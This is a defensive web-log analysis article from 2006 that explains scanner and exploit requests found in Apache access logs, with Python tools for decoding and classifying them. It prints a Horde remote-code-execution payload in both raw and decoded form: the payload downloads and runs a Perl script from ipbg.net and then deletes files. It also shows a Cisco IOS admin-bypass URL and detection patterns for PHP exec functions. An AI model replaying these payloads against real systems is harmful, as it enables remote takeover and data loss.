Title    : Web logs of web attacks, part 2
Author   : 좋은진호 (truefeel, http://coffeenix.net/ )
Written  : 2006.5.25 (Thu) ~
Compiled : 2006.9.18 (Mon)
This is the second web-log analysis (of sorts), following 'Web logs of web attacks'. A great many
kinds of web-attack logs have piled up in the meantime, but many are hard to analyze conclusively
(no related material could be found). Analyzing and writing up every log at this point is obviously
impossible, and holding the article back to provide more results would delay it too much, so I have
written up at least part of them. When I work out which attack attempt an already-recorded log
corresponds to, I will add it to this article.
How to judge whether a logged web attack actually succeeded in compromising the system is covered in
the earlier article:
http://coffeenix.net/board_view.php?bd_code=1352
※ The tables in this article display best in MSIE.
1. Logs left by the system monitoring tool What's Up
210.xxx.xx.xxx - - [19/Apr/2006:17:20:25 +0900] "HEAD / HTTP/1.0" 200 - "WhatsUp Professional/1.0"
210.xxx.xx.xxx - - [19/Apr/2006:17:35:33 +0900] "HEAD / HTTP/1.0" 200 - "WhatsUp Professional/1.0"
- Requests from What's Up, a Windows-based commercial monitoring tool, checking whether the web server
  is alive. The signature is a HEAD / at a fixed interval (about 15 minutes in the sample above) with
  the 'WhatsUp Professional/1.0' User-Agent. It is benign, but a User-Agent string is trivial to spoof,
  so confirm that the source IP really is your own monitoring host before excluding these lines from
  review.
References:
* WhatsUp home page
http://www.ipswitch.com/products/whatsup/index.asp
2. Attack exploiting a vulnerability in the open-source webmail Horde
201.219.7.xx - - [24/Apr/2006:00:08:53 +0900] "GET //README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:54 +0900] "GET /horde//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:54 +0900] "GET /horde2//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:55 +0900] "GET /horde3//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:55 +0900] "GET /horde-3.0.9//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:56 +0900] "GET /Horde//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:56 +0900] "GET /mail//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:57 +0900] "GET /webmail//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:58 +0900] "GET /horde-3.0.1//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:58 +0900] "GET /horde-3.0.2//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:59 +0900] "GET /horde-3.0.3//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:59 +0900] "GET /horde-3.0.4//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:09:00 +0900] "GET /horde-3.0.5//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:09:00 +0900] "GET /horde-3.0.6//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:09:01 +0900] "GET /horde-3.0.7//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:09:01 +0900] "GET /horde-3.0.8//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.65.xx.xxx - - [30/Apr/2006:06:36:30 +0900] "GET /thisdoesnotexistahaha.php HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.65.xx.xxx - - [30/Apr/2006:06:36:30 +0900] "GET /horde/services/help/ HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.65.xx.xxx - - [30/Apr/2006:06:36:31 +0900] "GET /horde-cvs/horde/services/help/ HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.65.xx.xxx - - [30/Apr/2006:06:36:31 +0900] "GET /pub/horde-cvs/horde/services/help/ HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.65.xx.xxx - - [30/Apr/2006:06:36:35 +0900] "GET /horde/services/help/ HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.65.xx.xxx - - [30/Apr/2006:06:36:36 +0900] "GET /pub/horde-cvs/horde/services/help/ HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
196.40.xx.xxx - - [23/Jun/2006:02:05:37 +0900] "GET /horde/services/help/?show=about&module=;%22.passthru(%22killall%20-9%20perl;cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;fetch%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;perl%20h;rm%20-rf%20*%22);'. HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
196.40.xx.xxx - - [23/Jun/2006:02:05:38 +0900] "GET /services/help/services/help/?show=about&module=;%22.passthru(%22killall%20-9%20perl;cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;fetch%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;perl%20h;rm%20-rf%20*%22);'. HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
196.40.xx.xxx - - [23/Jun/2006:02:05:38 +0900] "GET /horde-cvs/horde/services/help/?show=about&module=;%22.passthru(%22killall%20-9%20perl;cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;fetch%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;perl%20h;rm%20-rf%20*%22);'. HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
196.40.xx.xxx - - [23/Jun/2006:02:05:39 +0900] "GET /pub/horde-cvs/horde/services/help/?show=about&module=;%22.passthru(%22killall%20-9%20perl;cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;fetch%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;perl%20h;rm%20-rf%20*%22);'. HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
- IP : Ecuador (EC, 201.219.7.0/24)
       United States (216.65.0.0 - 216.65.127.255)
       Costa Rica (CR, 196.40.85.128/25)
- The three groups are the three stages of one kind of campaign. The first host walks the usual
  install paths (/horde, /horde2, /horde3, /horde-3.0.x, /mail, /webmail, /Horde) asking for
  //README, the README a Horde tree carries at its top level, to confirm an installation and read off
  its version. The second host first requests /thisdoesnotexistahaha.php, presumably to verify that
  the server really answers 404 for missing files, and then probes for the help viewer at
  services/help/ under several paths. The third host fires the exploit: the module parameter of
  services/help/?show=about is filled with PHP code, which only works if the help viewer evaluates
  that parameter as code, and every '/' is written as chr(47) so the slashes survive as string
  concatenation. URL-decoded, with the concatenation evaluated, the injected call is
  passthru("killall -9 perl;cd /tmp;wget http://ipbg.net/h;fetch http://ipbg.net/h;curl -O h http://ipbg.net/h;perl h;rm -rf *")
  i.e. kill any running perl, fetch a Perl script named 'h' from ipbg.net with whichever downloader
  the box has (wget on Linux, fetch on FreeBSD, curl elsewhere), run it, and wipe /tmp behind it.
- Every request returned 404 because Horde is not installed on this server, so nothing was executed
  here. On a host that does run Horde, the same line with a 200 status means the command ran as the
  web-server user: look for a file named h in /tmp, for perl processes owned by the web-server user,
  and treat the host as compromised.
References:
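To make the third log group readable without doing the decoding by hand, here is a small decoder added for this article (it is not code from the original post, nor from Horde): it parses the access-log format used on this page, URL-decodes the module parameter by hand (older parse_qs would split on the ';' inside the payload), and evaluates the PHP "literal".chr(N)."literal" concatenation so the exact shell command handed to passthru() can be read. HORDE_LINE is the first 196.40.xx.xxx entry above, BENIGN_LINE is the What's Up line from section 1; the function names and the assumed LogFormat are my own.

```python
import re
from urllib.parse import unquote

# Access-log format used on this page (assumption): %h %l %u %t "%r" %>s %b "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: (?P<proto>HTTP/\d\.\d))?" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<ua>[^"]*)"$'
)

# The payload builds its string from two kinds of PHP token: "literal" and chr(N)
PHP_TOKEN_RE = re.compile(r'"(?P<lit>[^"]*)"|chr\((?P<code>\d+)\)')

# PHP functions that never belong in a help-viewer query string
PHP_EXEC_FUNCS = ("passthru", "system", "shell_exec", "exec")

# Copied from the page: first 196.40.xx.xxx line (attack) and a What's Up line (benign)
HORDE_LINE = '''196.40.xx.xxx - - [23/Jun/2006:02:05:37 +0900] "GET /horde/services/help/?show=about&module=;%22.passthru(%22killall%20-9%20perl;cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;fetch%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;perl%20h;rm%20-rf%20*%22);'. HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"'''
BENIGN_LINE = '210.xxx.xx.xxx - - [19/Apr/2006:17:20:25 +0900] "HEAD / HTTP/1.0" 200 - "WhatsUp Professional/1.0"'


def parse_line(line):
    """Split one access-log line into its fields."""
    m = LOG_RE.match(line)
    if not m:
        raise ValueError("unrecognised log line: %r" % line)
    return m.groupdict()


def query_params(target):
    """Decode the query string by hand: the payload contains ';', which older
    urllib.parse.parse_qs treats as a separator and so destroys the evidence."""
    _, _, query = target.partition("?")
    params = {}
    for part in query.split("&"):
        key, _, value = part.partition("=")
        params[key] = unquote(value)
    return params


def eval_php_concat(expr):
    """Evaluate a PHP expression made only of "literal" . chr(N) pieces."""
    out = []
    for tok in PHP_TOKEN_RE.finditer(expr):
        if tok.group("lit") is not None:
            out.append(tok.group("lit"))
        else:
            out.append(chr(int(tok.group("code"))))
    return "".join(out)


def injected_command(line):
    """Return the shell command the injected PHP would run, or None if the
    line is not a Horde help-viewer injection attempt."""
    rec = parse_line(line)
    if "/services/help/" not in rec["target"]:
        return None
    module = query_params(rec["target"]).get("module", "")
    # greedy .* reaches the last ')' so the nested chr(47) calls stay inside the argument
    call = re.search(r"(?:%s)\((.*)\)" % "|".join(PHP_EXEC_FUNCS), module)
    if call is None:
        return None
    return eval_php_concat(call.group(1))


if __name__ == "__main__":
    for line in (HORDE_LINE, BENIGN_LINE):
        rec = parse_line(line)
        print(rec["ip"], rec["status"], injected_command(line))
```

Run it over a whole access_log and any line for which injected_command() is not None and the status is 200 is the one to escalate; a 404, as on this page, only tells you the scanner found nothing to exploit.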
3. Attack exploiting the Windows Media Services ISAPI nsiislog.dll POST overflow vulnerability
202.100.xxx.xxx - - [24/Apr/2006:11:53:13 +0900] "GET /scripts/nsiislog.dll" 404 - "-"
202.100.xxx.xxx - - [24/Apr/2006:11:53:54 +0900] "GET /scripts/nsiislog.dll" 404 - "-"
- IP : China (CN, 202.100.96.0 - 202.100.127.255)
- The vulnerability was published in June 2003 (MS03-022) and applies to Windows Media Services on
  Windows 2000 Server.
  The GET above is the fingerprinting step, not the exploit itself: if a request of
  'GET /scripts/nsiislog.dll HTTP/1.0' on port 80 makes the server return the string
  'NetShow ISAPI Log Dll', the logging DLL is installed and reachable, and the attacker follows up
  with the oversized POST that triggers the overflow. A 404, as here, means the DLL is not present.
  Note that the request line in the log carries no HTTP version at all, the mark of a hand-rolled
  scanner rather than a browser. Note also that the banner only proves the DLL is exposed; whether
  the MS03-022 patch is applied cannot be read from it, so check the patch level, or remove the
  /scripts mapping for the DLL if the logging feature is not needed.
References:
* Microsoft Media Services ISAPI nsiislog.dll POST Overflow
http://www.osvdb.org/4535
* Windows Media Services Remote Command Execution #2
http://archives.neohapsis.com/archives/bugtraq/2003-06/0211.html
* Successful attack using MS03-022 vuln
http://lists.sans.org/pipermail/unisog/2003-September/022422.html
4. Proxy scanning logs from the proxy_scanner tool
- IP : China (CN, 211.100.32.0 - 211.100.95.255)
       China (CN, 61.135.0.0 - 61.135.255.255)
- These requests come from 'proxy_scanner', a proxy scanning tool released by a Chinese hacker in
  2004, and test whether the server can be used as a proxy: the request line carries a full URL on a
  host the scanner controls, and if the response contains that host's Provy_OK.html page, the server
  forwarded the request and is an open proxy.
- The requested URL has the following form:
http://check.$ip_address.v.80.(pdx8|PCN22|mt1|pw1).super.proxy.scanner.(i.thu.cn|ii.9966.org)/Provy_OK.html
  Every host under check...super.proxy.scanner.(i.thu.cn|ii.9966.org) resolves to 61.135.170.153, so
  apart from a few records (the DNS servers and so on) the zone appears to be configured with a
  wildcard '* IN A 61.135.170.153'.
- These web servers run lighttpd/1.4.11 (easy to confirm by telnetting to port 80).
- A web server that does not proxy treats the absolute URL as a request for its own /Provy_OK.html
  and answers 404. If your log shows these requests answered with 200, the request was forwarded;
  on Apache that means mod_proxy is loaded with ProxyRequests On, which should be Off (or the
  module removed) on any server that is not meant to be a forward proxy.
References:
* What's a super.proxy.scanner and why is it in my logs?
http://isc.sans.org/diary.php?storyid=1298
* Proxy Probes
http://www.splunk.com/splunkbin/426
5. Attack exploiting the Cisco IOS HTTP vulnerability that grants admin privileges
81.225.xx.xx - - [29/Aug/2006:13:23:45 +0900] "GET /level/16/exec/show%20conf HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95; PMF Master V3.0)"
- IP : Sweden (SE, 81.224.0.0 - 81.236.255.255)
- See item '14. Attack exploiting a very old (2001) HTTP vulnerability in Cisco switches' in the
  previous web-log analysis article.
- The vulnerability gives full admin privileges through a URL of the form
  http://Switch_IP/level/$NUMBER/exec/...., where $NUMBER in /level/$NUMBER/exec/... is a number
  between 16 and 99. The request above asks the device to run 'show conf', i.e. to dump its
  configuration, passwords included. The 404 here simply means the target is an Apache server and not
  a Cisco device; the probe is an untargeted sweep. The exposure that matters is IOS devices running
  an unpatched release with the HTTP server enabled (ip http server), so inventory those rather than
  the web servers that happen to log the probe.
- Cisco Global Exploiter is an automated tool that scans for Cisco vulnerabilities.
References:
* Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
http://www.securityfocus.com/bid/2936
* Multiple Cisco Exploit Codes
http://www.securiteam.com/exploits/5OP0L1FCAE.html
http://downloads.securityfocus.com/vulnerabilities/exploits/ciscoMultipleVulnsExploit.pl
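As an added example (not from the original article), the following rule set turns the five sections of this page into detection logic over the page's own log lines, plus one constructed line for the proxy probe of section 4, which the article describes only by its URL form. The rule labels, the severity scheme and the assumed LogFormat are my own; the point is that each signature is scored together with the HTTP status, because the 404s on this page mean the probed component is absent, whereas the same request answered with 200 is an incident.

```python
import re
from collections import Counter

# Log format used on this page (assumption): %h %l %u %t "%r" %>s %b "%{User-Agent}i"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ua>[^"]*)"$'
)

# (label, field to test, pattern). First match wins, so the Horde RCE rule
# precedes the plain help-viewer probe it would otherwise be mistaken for.
RULES = [
    ("monitoring:WhatsUp", "ua", re.compile(r"^WhatsUp Professional/")),
    ("rce:horde-help-module", "req",
     re.compile(r"/services/help/\?.*module=.*(?:passthru|system|shell_exec|exec)\(")),
    ("recon:horde-readme", "req", re.compile(r"^GET \S*//README(?: |$)")),
    ("recon:horde-help-viewer", "req", re.compile(r"^GET \S*/services/help/(?: |$)")),
    ("recon:nsiislog-ms03-022", "req", re.compile(r"^GET /scripts/nsiislog\.dll(?: |$)")),
    ("authbypass:cisco-ios-http", "req",
     re.compile(r"^GET /level/(?:1[6-9]|[2-9]\d)/exec/")),  # levels 16..99 per section 5
    ("proxyprobe:super.proxy.scanner", "req",
     re.compile(r"^GET http://check\.\S*\.super\.proxy\.scanner\.\S*/Provy_OK\.html")),
]

# Lines 0..6 are copied from this page; line 7 is constructed from the URL form in section 4
SAMPLE_LINES = [
    '210.xxx.xx.xxx - - [19/Apr/2006:17:20:25 +0900] "HEAD / HTTP/1.0" 200 - "WhatsUp Professional/1.0"',
    '201.219.7.xx - - [24/Apr/2006:00:08:54 +0900] "GET /horde//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    '216.65.xx.xxx - - [30/Apr/2006:06:36:30 +0900] "GET /thisdoesnotexistahaha.php HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    '216.65.xx.xxx - - [30/Apr/2006:06:36:30 +0900] "GET /horde/services/help/ HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    '''196.40.xx.xxx - - [23/Jun/2006:02:05:37 +0900] "GET /horde/services/help/?show=about&module=;%22.passthru(%22killall%20-9%20perl;cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;fetch%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;perl%20h;rm%20-rf%20*%22);'. HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"''',
    '202.100.xxx.xxx - - [24/Apr/2006:11:53:13 +0900] "GET /scripts/nsiislog.dll" 404 - "-"',
    '81.225.xx.xx - - [29/Aug/2006:13:23:45 +0900] "GET /level/16/exec/show%20conf HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95; PMF Master V3.0)"',
    '211.100.xx.xxx - - [10/May/2006:03:12:07 +0900] "GET http://check.210.xxx.xx.xxx.v.80.pdx8.super.proxy.scanner.i.thu.cn/Provy_OK.html HTTP/1.1" 404 - "-"',
]


def severity(label, status):
    """A 404 means the probed component is absent; the same request with a
    200 means the exploit or probe reached real code and needs a look."""
    if label.startswith("monitoring"):
        return "info"
    if label == "unclassified":
        return "unknown"
    if label.startswith(("rce:", "authbypass:")):
        return "critical" if status == 200 else "attempt"
    return "attempt" if status == 404 else "review"


def classify(line):
    """Return (label, status, severity) for one access-log line."""
    m = LINE_RE.match(line)
    if not m:
        raise ValueError("unrecognised log line: %r" % line)
    rec = m.groupdict()
    status = int(rec["status"])
    label = "unclassified"
    for name, field, rx in RULES:
        if rx.search(rec[field]):
            label = name
            break
    return label, status, severity(label, status)


def summarize(lines):
    """Count labels over a batch of lines, e.g. one day of access_log."""
    return Counter(classify(line)[0] for line in lines)


if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print("%-32s %s" % classify(line)[::2], line[:60])
    print(summarize(SAMPLE_LINES))
```

The /thisdoesnotexistahaha.php line deliberately stays unclassified: it is the scanner's 404 calibration request and carries no signature of its own, which is exactly why one should never tune rules until every line is labelled, but rather correlate by source IP and time with the labelled lines around it.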